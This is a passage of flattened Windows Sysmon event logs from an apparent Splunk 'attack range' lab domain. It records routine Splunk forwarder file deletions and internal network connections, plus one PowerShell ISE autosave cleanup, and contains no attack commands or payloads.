23542300x80000000000000001060854Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:28.124{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E474E0DC7EB4AD8E0FD3CE586329EC7E,SHA256=FBBE6DFAE8285ABA8ADAF1838210F907C20AE40AC37EB3CC0E3B15B74E57FE68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060853Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:28.124{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2E5655E83CA51C3FD1E6C9256728EF8,SHA256=2D9BA4DE343A89DD9280A570EEB22D7D106A6F0CD64783B8CCE3950EAD3E5FC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245511Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:28.578{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=263EB518E8C5F9F6571A3250FD5BDE37,SHA256=3EB4D2D05F87038A599D19E0C4DC6B0454155DF1AF66CF1834E21A6C4D72826A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060855Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:29.515{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35CEE2ECC0D018E040F2C201A478190,SHA256=9F4A4C5FAFD6A4CBD49515CE9462AC9DB888E9FAB22600B0856D3D51D9DDF79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245512Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:29.578{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A44D1022B52957881DF28643BA90A2,SHA256=5EEE8751BE28F7BBC2F8939EFFA1BF714355ABEC8C862533FF9DD590F84C7FFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060856Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:30.875{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EF825E85491CE0B350AF1825CC70577,SHA256=27EAB21F5BFA82E1EFC35939F61163DAA122EC81B52884794BD733E2B0C70C22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245513Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:30.578{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABB366F97CF5B46EB3F178ECB8EFF077,SHA256=30336E997FF04A0D513F21D509F2867F3AF97E0DA2D0A4F14721C27765D1B927,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060857Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:27.903{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54766-false10.0.1.12-8000- 23542300x8000000000000000245516Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:31.609{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=833FC4D655E97BB377FA07936715EC84,SHA256=FD553E00F73006057A6AD2879C86B51685136C802703A007CAEDF9DE2FC13AD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245515Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:31.062{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9313F6CF1C66C7E731AC22B7816C0B19,SHA256=3AEFD8C96A80BC8EFAC68259BEE94A012064E7DEC669C4677F5E4A38E9FCFF12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245514Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:31.062{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8683F1D19E0BDA8E4EC5DC5B0374BDA2,SHA256=C4226B4D076A2515F0A5319E0B9594EB3B5A85E5A2B92DB78CE4F8CF2337214F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060858Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:32.234{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A86D05B5F93D7378C707EF7E0D7AB03F,SHA256=020A224160B74B2E4293143565DA2F486DF9AAB6EC2ECCB8CE0018B841B64DE1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245518Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:30.492{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64753-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245517Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:32.609{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=268F4F13F1DE6BB7E57E3004E6A50DEB,SHA256=E867A80BA1A7401AE0CF2B49909E0B2366ED4BAC491531955CC2F72F33479942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060859Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:33.594{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E3F1286BE7AB947F68FB2B169F52EE7,SHA256=7BB6790E73D9407DF06657B8A9F7211C084BB2D25CF701EECE5661DAFC8E8331,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245519Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:33.609{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ECCB8A8F66E1BC7CDFD0F3E5FAE0C91,SHA256=263DCAC07221CA0F3F2EE18CAE742D44DE84341FAEAA0CAC1076E68D50944FCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060860Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:34.953{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AFB0A54B658D5FCB0F7A44DF0529C01,SHA256=ACEC3F7EA1D210D6C0D76248C08DBCC0999F6B0F72433D37B39EEB07B793B35D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245520Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:34.609{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEDA00EB6FBC53C982E1986698E521E3,SHA256=A496C57D4278DE504C69F3FB03FA6D0C1F651E441A464A4687862D67D1C7CA3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245521Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:35.609{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=638D2F1CFE3E1BE4A5E5BB1D9512A8B2,SHA256=4B65FBC3A75445CB97EC368ED2B137EAA86CDFAC6223520EF8F6023C6346E6DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060862Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:36.329{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B6936943DDF9B51EAACD1B62BFBB44B,SHA256=CD8ABD15037AC3792942ADE3D3A2B485E9F36FD2C2857632A93A26F18A35F2F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060861Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:32.903{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54767-false10.0.1.12-8000- 23542300x8000000000000000245522Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:36.609{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=479EDC7633E9BC960C6BD3012BEBB427,SHA256=1A8C5471BEAF233DEEC344A9F7569A72256620B6EA0BC124BB477204B6B6B602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060864Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:37.688{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7263C1495666446D012033326004947F,SHA256=E5152808F29495E48B927D962CD1666B22F1119B890275C4B6AA76FA8636CB71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060863Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:37.000{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39A39981DA0401BF522FBB5569B85ADD,SHA256=B28B385426CECBEBBCA3A7BB8DB8F1E56B510047967AB8076D83AC778490E69A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245526Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:36.492{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64754-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245525Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:37.640{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DAE15EB168FF20E409902C5F1B23C12,SHA256=60256F12E5B54B71EB4A8991AD8ED022C7BE5A0F67E40ACBC36C1859C8FDCEA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245524Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:37.093{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E679D2F4262BEB8D21FA21DE5141E4A6,SHA256=7B280383C7110BE9AB97B99EA2E3B6D84D0B85C3ECE1B2F7CB23C02A499F075A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245523Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:37.093{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9313F6CF1C66C7E731AC22B7816C0B19,SHA256=3AEFD8C96A80BC8EFAC68259BEE94A012064E7DEC669C4677F5E4A38E9FCFF12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060866Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:38.501{7F8C56E7-4F98-6063-D400-00000000AF01}3720ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\3720.xml~RFcb9fe.TMPMD5=2A60D97C76F5CF2752AED82FAD0227B8,SHA256=69E369B0D3268BE891A2A7995B65D940CB8412510DCA4E2AFE7DA6E57A8CF59A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060865Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:38.173{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4F98-6063-D300-00000000AF01}6052C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000245527Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:38.656{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B779E40F33CC749B7B805F4CC10F6D5C,SHA256=2FB642742B2C81B0EDA4FA5D2CA3C33AC8A0D12B8F8642FAC45A89ADDC11A9AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060867Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:39.048{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B146A89003C82E59BC2CE7E2CE6FFFFF,SHA256=9688943D25487970FC2042A55D46FE2A1E9F2F3E6CB1401D45FC9FEC0F290965,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245528Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:39.671{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A64F870E0065B0FD4BC4FC0E2F3038,SHA256=8A5287C31F3074276EDAEEDA2FD9EF9DC51918F559E387DE1700D78DB9ADB751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060868Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:40.407{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D3E5870DD00FF48F955A199C6C74D3B,SHA256=CD8CC723F945AA7667AD25822E1720F6833DB25741220530DB90CCC58D4EB4B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245529Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:40.671{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31E1C8016303A3E4AF7EA21BCECFC8A1,SHA256=E44F994B35853746CCAA18A8E509168DB749ECF6CD5770254651DFDB89F61384,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060869Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:38.012{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54768-false10.0.1.12-8000- 23542300x8000000000000000245530Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:41.671{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AC41BC48586B2C8E1BF1B80AFCEE114,SHA256=79016108CA28D5196FEA6D8E9EA8DE64FFCDD3A742F7869AFA54E567DCE2AAA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060870Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:42.423{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82D20AD36CC9ED8AC34870A007C7E4C6,SHA256=60D5F270CD8B54FB9276E9D443E63C2D7D7676E376888DE71B3B63CBDCFD02DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245533Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:42.750{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC640C9EA9EE5EB666AF9B4E43423538,SHA256=0A9CDF179DD832D49D19A125086E2BE7FE6C9AAED665FA8DA35A175EEE8381BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245532Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:41.492{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64755-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245531Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:42.062{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E679D2F4262BEB8D21FA21DE5141E4A6,SHA256=7B280383C7110BE9AB97B99EA2E3B6D84D0B85C3ECE1B2F7CB23C02A499F075A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245534Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:43.750{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3090FCACA5B034C31AE48D40CA6B6475,SHA256=DECFF883196A9478BDB97B9B0FA17682F734DDA3B46B3995A947896F9E4C2B4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060871Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:44.048{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B0C9FD8E1F6DB9096670B8D63D6E072,SHA256=55722B3ADCC5088923108E24D0BCCD757EEABC9FECCAA4B5602A040DDBAB2A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245535Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:44.765{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89A1B4B59480E2A673888F8E6EEBB3E4,SHA256=94E919D76E393FFEEFF20ECBF3C29778B66B9B0820D349CB0C2ACA82C7481F52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060872Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:45.423{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83F1E2A1414DC41E1B014EE74ECAA917,SHA256=C2D9992F62B05FFB2A9A11A39D60AC779F1997E5DED1B5086EB5BEFD71906A48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245536Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:45.765{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F822274E4428DE5F980A382B1F52E4C,SHA256=0DF9C367B5A1AC7D9E93892D9765C6FAEDE0B9FAABD7538DD3C538D13CE2E100,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060873Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:46.783{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=983ADE8261C3B72AC15C401CA1CB7AAA,SHA256=873B0D40C05737DC2C03CCB781A83E0DBB2C63959CB072083EAB569900906D2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245537Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:46.812{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=418E8F75AB2F795702B955D7F1252C85,SHA256=2BB75B7E9DAAA1B35453BD247FD696D642C8E98006B2CAC0156BDC848554BCEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060875Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:47.455{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BEF972E37EA6358598D1E7904CA1AFF,SHA256=824EBAE95327643FB876852AD8228A89318740FDBFF62C7F06C1B08E7C6A6F53,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060874Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:43.950{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54769-false10.0.1.12-8000- 23542300x8000000000000000245538Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:47.828{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D84D72E09DFE033A8179A6D7DB382E6,SHA256=D213D3DAE0E237648B657C27523B69C74DDC42123072A4DC4EB90C0118DACEC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060876Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 